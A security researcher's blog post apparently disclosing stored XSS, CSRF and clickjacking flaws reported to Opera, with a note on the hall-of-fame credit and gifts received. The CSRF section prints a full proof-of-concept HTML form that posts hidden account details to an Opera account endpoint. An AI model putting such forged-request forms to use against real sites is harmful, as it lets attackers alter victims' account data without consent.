Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera
Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.
I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:
Stored XSS
The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.
CSRF POC
The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.
POC
<body>
<form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
<input type="hidden" name="email" value="rafaybaloch@gmail.com" />
<input type="hidden" name="name" value="Rafay Baloch" />
<input type="hidden" name="address1" value="f-10,afasf afs asf 1,block 15 near income tax office,asssssss-e-johar" />
<input type="hidden" name="address2" value="" />
<input type="hidden" name="city" value="Karachi" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="country" value="PK" />
<input type="hidden" name="zip" value="44000" />
<input type="hidden" name="phone" value="+923333333333" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Opera Hall Of Fame
So, For my findings, Opera listed my name under their hall of fame:
Gift from Opera
As a token of appreciation, they also send me the following gifts: